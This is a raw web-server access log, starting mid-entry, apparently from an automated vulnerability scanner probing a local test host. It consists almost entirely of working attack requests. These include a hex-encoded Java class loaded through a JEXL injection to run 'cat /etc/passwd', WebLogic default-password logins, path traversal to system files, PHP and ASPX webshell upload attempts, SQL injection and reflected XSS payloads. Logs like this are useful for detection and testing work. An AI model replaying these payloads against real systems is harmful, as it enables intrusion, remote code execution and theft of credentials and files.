97465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \x5CndefineClass.setAccessible(true);\x5Cnx=defineClass.invoke(\x5Cn y,\x5Cn 'Exploit.Test234',\x5Cn z.getBytes('latin1'), 0,\x5Cn 3054\x5Cn);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\x5Cn\x22}, {\x22property\x22: \x22type\x22, \x22value\x22: \x22jexl\x22}], \x22limit\x22: 50, \x22page\x22: 1}], \x22method\x22: \x22previewAssets\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /service/extdirect HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"j_username=weblogic&j_password=weblogic1&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/53 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /info/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /i.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/bc/gui/sap/its/webgui HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fpui/jsp/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/images/MyVue/MyVueHelp.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php-fpm.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%80%B1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/admin/login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0AwmuUploadFiles\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmu_nonce\x22\x0D\x0A\x0D\x0A{{wmuSecurity}}\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmuAttachmentsData\x22\x0D\x0A\x0D\x0Aundefined\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmu_files[0]\x22; filename=\x22rce.php\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\xFF\xD8\xFF\xE1jExifMM*\xFD\xFD\xFDi\xFD\xFD>\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xA8\xFD\xFD\xFD\xFD\xC0\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFF\xE0\xFDJFIF\xFD\xFD\xFD\xFD\xFF\xDBC\xFD\xFD\x0C\xFD\x0C\x0A\xFD\xFD\x0D\x0A\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22postId\x22\x0D\x0A\x0D\x0A1\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /beans HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-----------------------------20873900192357278038549710136\x0D\x0AContent-Disposition: form-data; name=\x22file1\x22; filename=\x22poc.aspx\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A29KD1woA63LShJ0hKHC0dQHcFwq\x0D\x0A-----------------------------20873900192357278038549710136--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"j_username=weblogic&j_password=welcome1&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/54 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A 00000001-00000001\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A <_this xsi:type=\x22ManagedObjectReference\x22 type=\x22ServiceInstance\x22>ServiceInstance\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sdk/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(29KD1upG1DSVY1QWlB7EZ499NHM)) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /asdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"_=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22supported_type\x22\x0D\x0A\x0D\x0Atxt%\x0D\x0A-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22size_limit\x22\x0D\x0A\x0D\x0A5242880\x0D\x0A-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Adnd_codedropz_upload\x0D\x0A-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22type\x22\x0D\x0A\x0D\x0Aclick\x0D\x0A-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22upload-file\x22; filename=\x2229KD24S4AtfpRK4jil3YsVxwlUR.txt%\x22\x0D\x0AContent-Type: application/x-httpd-php\x0D\x0A\x0D\x0ACVE-2020-12800-29KD24S4AtfpRK4jil3YsVxwlUR\x0D\x0A-----------------------------350278735926454076983690555601--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jeecg-boot/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ucmdb-ui/cms/loginRequest.do; HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%80%B5example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jkstatus/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/beans HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"j_username=weblogic&j_password=Oracle@123&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/55 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/contentfinder/connector/suggestions.json;%0aOJh.css?query_term=path%3a/&pre=29KD26hf3vNeeofuU3Dsfn7Z1ki HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/security.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/29KD24S4AtfpRK4jil3YsVxwlUR.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mailsms/s?func=ADMIN:appState&dumpConfig=/ 